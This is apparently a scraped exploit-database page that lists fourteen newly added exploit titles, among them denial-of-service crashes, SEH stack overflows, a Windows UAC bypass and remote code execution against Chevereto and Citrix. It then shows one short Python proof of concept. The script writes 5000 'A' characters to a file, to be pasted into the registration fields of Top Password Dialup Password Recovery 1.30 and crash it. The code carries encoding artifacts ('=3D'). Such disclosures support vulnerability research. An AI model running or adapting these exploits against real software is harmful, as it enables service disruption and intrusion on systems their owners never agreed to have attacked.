
14 changes to exploits/shellcodes SpotDialup 1.6.7 - 'Name' Denial of Service (PoC) SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC) Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC) Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC) TaskCanvas 1.4.0 - 'Registration' Denial Of Service Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC) Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions Allok Video Converter 4.6.1217 - Stack Overflow (SEH) Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH) Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass) Chevereto 3.13.4 Core - Remote Code Execution Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit) Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
17 lines
No EOL
529 B
Python
Executable file
17 lines
No EOL
529 B
Python
Executable file
# Exploit Title: Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)
|
|
# Date: 2020-01-12
|
|
# Exploit Author: Antonio de la Piedra
|
|
# Vendor Homepage: https://www.top-password.com/
|
|
# Software Link: https://www.top-password.com/download/DialupPRSetup.exe
|
|
# Version: 1.30
|
|
# Tested on: Windows 7 SP1 32-bit
|
|
|
|
# Copy paste the contents of poc.txt into the
|
|
# User Name / Registration Code input fields.
|
|
|
|
#!/usr/bin/python
|
|
|
|
poc =3D "A"*5000
|
|
file =3D open("poc.txt","w")
|
|
file.write(poc)
|
|
file.close() |